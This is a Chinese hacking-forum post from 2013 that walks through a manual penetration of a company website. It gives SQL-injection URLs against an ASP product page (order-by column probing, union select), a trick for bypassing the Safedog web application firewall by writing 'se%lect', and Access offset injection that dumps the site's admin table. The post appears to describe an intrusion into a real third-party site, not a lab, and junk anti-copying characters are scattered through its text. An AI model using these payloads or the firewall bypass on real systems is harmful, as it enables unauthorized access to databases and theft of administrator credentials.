找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1959|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
- _" _7 U3 q1 q, V. M7 V
# A& L, l9 V. W1 q) G  @; T
) v0 V4 A$ b% C, C7 O, ~7 T  e顺手加个admin
! |; Y2 f* o, y- V  x# ]9 p2 X7 @7 B4 P7 l. h2 _

# v0 M1 B0 [) G默认后台。
# M" w% Q3 x) U4 A% E回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​9 p2 j2 y) |5 L' [2 Q. r
$ X6 K6 ?# P! t' u% c
+ X" }3 ^) Y: p" w% b) Q+ o) @  E

8 w) w) P3 O. _所以就不用御剑扫了,待会直接封IP。. }& a* H1 i8 A; [  u- Y1 [
' e' V7 t2 t2 f! ]( D0 p( E& X6 [3 b
用order by语句判断是否存在注入。$ Z% U  K- k$ D. N$ {. A
http://www.xxx.com /product_show.asp?id=997 order by 1* F9 b6 Y: x$ R' r% Q9 K& j
http://www.xxx.com /product_show.asp?id=997 order by 100
1 J- A, M: u1 P4 S现在存在注入,经测试后发现是9个字段。. p, ?& x  W5 [3 j  x# B+ ~

" D/ o+ v$ K, m( P4 `  j接下来进行联合查询,猜是否存在admin表。
& C% R% H0 u8 o: D5 Y0 ehttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
( U! F* G2 @# _3 Z# ]
7 \' e6 f( s: q* b$ d
# n* s# [1 [$ ~; Y+ I9 ~  [3 }
9 F( `, V, K& Z在select中间加个%,se%lect绕过安全狗。( X* M  n! p3 I% A

  W& _- F1 {' r% ?; r  v  }& ^$ X) Q2 ^: r. h6 q
发现存在admin表,然后开始手工猜常用的字段。
0 e6 H6 Y, i+ @. I7 E. U& p" B# j纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。) C, }0 S9 M4 n& \

: ~( {% p% l# m/ d' k9 F6 V突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
, P6 `# Q+ X0 @* i, G
0 _% N! \  @0 u3 T: Z; }/ c科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
/ r' l4 Z3 V$ d) E# ahttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin4 i4 e1 z) t7 l3 H7 ^0 Q
好了,敏感内容出显了。​( L  v7 D/ i- d' c3 D

# I# w5 K" e" y4 y5 ^" y: x: x3 o8 M& j5 \
7 ^( g! G, G0 N2 }3 D, M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表